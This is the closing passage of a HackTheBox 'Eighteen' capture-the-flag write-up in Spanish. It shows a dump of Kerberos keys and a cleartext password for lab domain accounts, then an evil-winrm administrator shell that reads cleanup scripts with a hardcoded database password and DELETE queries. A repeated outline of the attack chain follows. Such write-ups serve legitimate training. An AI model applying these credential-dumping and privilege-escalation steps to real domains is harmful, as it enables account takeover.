eighteen.htb\jamie.dunn:aes128-cts-hmac-sha1-96:7bd2a2b8ad4b67a8f6e933913f987d79
eighteen.htb\jamie.dunn:0x17:9fbaaf9e93e576187bb840e93971792a
eighteen.htb\jane.smith:0x14:52481c342ea2b37e0712bfb0ab47cd6be9863bc9620df47e8e7c42cd0a683576
eighteen.htb\jane.smith:0x13:9e2e52016bd944eac3afe4a86cf41c5e
eighteen.htb\jane.smith:aes256-cts-hmac-sha1-96:584e2d51dfa5d24f593e06fc311410b5f71e4b80433141b7028bc523dac6bee0
eighteen.htb\jane.smith:aes128-cts-hmac-sha1-96:73fb572dc6d4375f8ceb1447b6906468
eighteen.htb\jane.smith:0x17:42554e3213381f9d1787d2dbe6850d21
eighteen.htb\alice.jones:0x14:349ce10e4b89ca16c1ac95f9d3d37d6e3a90f9ae8e4b598062a8774cf3dfbdda
eighteen.htb\alice.jones:0x13:a8172a1f22b6e1a2ab1343690fea1c7f
eighteen.htb\alice.jones:aes256-cts-hmac-sha1-96:ff947e4183a74a25c5a5cbc3a237d0c6f36ec9467efcfdaebf179acd5f67fe59
eighteen.htb\alice.jones:aes128-cts-hmac-sha1-96:24b72c652037857afe750f9c10bcc1a1
eighteen.htb\alice.jones:0x17:43f8a72420ee58573f6e4f453e72843a
eighteen.htb\adam.scott:0x14:ce816f93993d73cb234f5c9b73a60aa489f8f3079f6870fda146762962b55656
eighteen.htb\adam.scott:0x13:526a35452b9de155f780917b3a403506
eighteen.htb\adam.scott:aes256-cts-hmac-sha1-96:02f93f7e9e128c32449e2f20475afcdfb6cc2b4444ac8fd0b02406af018f75e5
eighteen.htb\adam.scott:aes128-cts-hmac-sha1-96:041716887b5efba3ba1dcddad9bbe98e
eighteen.htb\adam.scott:0x17:9964dae494a77414e34aff4f34412166
eighteen.htb\bob.brown:0x14:393e55b25bb1853b29979c980c19b6d0845fadb640eac609d1a85a563e7b06cf
eighteen.htb\bob.brown:0x13:1172eba897e9a70ae3619667c1831ca2
eighteen.htb\bob.brown:aes256-cts-hmac-sha1-96:718ebbe36922b7f48f6bfb964c68f142b94e26a1f55718847d20b4ef6e056538
eighteen.htb\bob.brown:aes128-cts-hmac-sha1-96:0eb1644648b1d905ce8042de351826c7
eighteen.htb\bob.brown:0x17:7e86c41ddac3f95c986e0382239ab1ea
eighteen.htb\carol.white:0x14:3b77670fed849cc244de4ccc7cafee944dea00e37570f16736b1108a246eada4
eighteen.htb\carol.white:0x13:7ef7b5d056f8251ffe901ebfd2543672
eighteen.htb\carol.white:aes256-cts-hmac-sha1-96:20a1f696ab33da115e5034c8087bbe86859ac10f6547a0545af0ca560190cb40
eighteen.htb\carol.white:aes128-cts-hmac-sha1-96:f28948aeb60d1552754c987b590d8428
eighteen.htb\carol.white:0x17:6056d42866209a6744cb6294df075640
eighteen.htb\dave.green:0x14:1f9cc062b18d3ffbbf786c27bf65cd9dff81d9ba8c4af5285741364c53437829
eighteen.htb\dave.green:0x13:68cb75c76f62ef851d01110d46346e38
eighteen.htb\dave.green:aes256-cts-hmac-sha1-96:15bea1d4b7740e14dd6b47c7734c19bb031874830e69f1cecac48d6fcc84cbf9
eighteen.htb\dave.green:aes128-cts-hmac-sha1-96:88d5e8df3683ab6bac2cfc2c40f022e8
eighteen.htb\dave.green:0x17:7624e4baa9c950aa3e0f2c8b1df72ee9
DC01$:0x14:14ad20e30aa3e8b21916121142c19fe88f15f2031af81806c58a24e38b06ace8
DC01$:0x13:3ecd1e42aec8986642eaf7cb2ef5b7ec
DC01$:aes256-cts-hmac-sha1-96:25d862a0f5cbe47c62167d4f57ef04d768965e76e1f8d18b4b95878b8a4fd028
DC01$:aes128-cts-hmac-sha1-96:a4a8a36f0bf18ace2a587e5524a77843
DC01$:0x17:d79b6837ac78c51c79aab3d970875584
[*] ClearText passwords grabbed
eighteen.htb\adam.scott:CLEARTEXT:iloveyou1
[*] Cleaning up... 
❯ 

Cronjobs Cleanup

Localmente existen dos scripts que son utilizados para mantener la maquina en su estado inicial.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75


evil-winrm-py PS C:\Users\Administrator\Documents> dir


    Directory: C:\Users\Administrator\Documents


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
-a----        10/29/2025   5:40 AM           1226 clean_OU.ps1                                                          
-a----         11/8/2025   7:18 AM            421 warmup_flask.ps1                                                      


evil-winrm-py PS C:\Users\Administrator\Documents> cat clean_OU.ps1
# Clean OU
Import-Module ActiveDirectory

$ou = "OU=Staff,DC=eighteen,DC=htb"

Get-ADObject -SearchBase $ou -Filter 'ObjectClass -eq "msDS-DelegatedManagedServiceAccount"' | ForEach-Object {
    Remove-ADObject -Identity $_.DistinguishedName -Confirm:$false
}

# Clean financial_planner database

$server = "127.0.0.1"
$database = "financial_planner"
$username = "appdev"
$password = 'MissThisElite$90'

$connectionString = "Server=$server;Database=$database;User ID=$username;Password=$password;TrustServerCertificate=True;"

$queries = @(
    "DELETE FROM users WHERE id > 1002;",
    "DELETE FROM incomes;",
    "DELETE FROM expenses;",
    "DELETE FROM allocations;"
)

$connection = New-Object System.Data.SqlClient.SqlConnection
$connection.ConnectionString = $connectionString

try {
    $connection.Open()
    foreach ($query in $queries) {
        $command = $connection.CreateCommand()
        $command.CommandText = $query

        $rowsAffected = $command.ExecuteNonQuery()
        Write-Output "Executed: $query"
        Write-Output "Rows affected: $rowsAffected`n"
    }
}
catch {
    Write-Error "Error: $($_.Exception.Message)"
}
finally {
    $connection.Close()
}
evil-winrm-py PS C:\Users\Administrator\Documents> cat warmup_flask.ps1
Import-Module WebAdministration
$siteName = "financial_planner"

while (($site = Get-Website -Name $siteName) -and $site.state -ne "Started") {
    Start-Sleep -Seconds 1
}

Restart-WebItem "IIS:\Sites\$siteName"
Start-Sleep -Seconds 2

try {
    Invoke-WebRequest -Uri "http://eighteen.htb/" -UseBasicParsing -TimeoutSec 10 | Out-Null
} catch {
    Write-Warning "Could not reach the site for warmup: $_"
}
evil-winrm-py PS C:\Users\Administrator\Documents>

HackTheBox - Eighteen

Machine Information: Certified

Recon

nmap

Service Access

Web Site

Directory Brute Forcing

User Register

MSSQL

Grab the Hash

Cracking the Hash

DB Access

Cracking the Hash

Admin - Website

Enumerating Users

Password Spraying

User - Adam.Scott

Web App - Source Code

Tunneling

Privesc

BloodyAD - CREATE_CHILD

BadSuccessor

Exploit

BadSuccesor Commands Exploitation

Shell

Dump Hashes

Cronjobs Cleanup

HackTheBox - Eighteen

HackTheBox - Eighteen

Machine Information: Certified

Recon

nmap

Service Access

Web Site

Directory Brute Forcing

User Register

MSSQL

Grab the Hash

Cracking the Hash

DB Access

Cracking the Hash

Admin - Website

Enumerating Users

Password Spraying

User - Adam.Scott

Web App - Source Code

Tunneling

Privesc

BloodyAD - CREATE_CHILD

BadSuccessor

Exploit

BadSuccesor Commands Exploitation

Shell

Dump Hashes

Cronjobs Cleanup

Read other posts

HackTheBox - Eighteen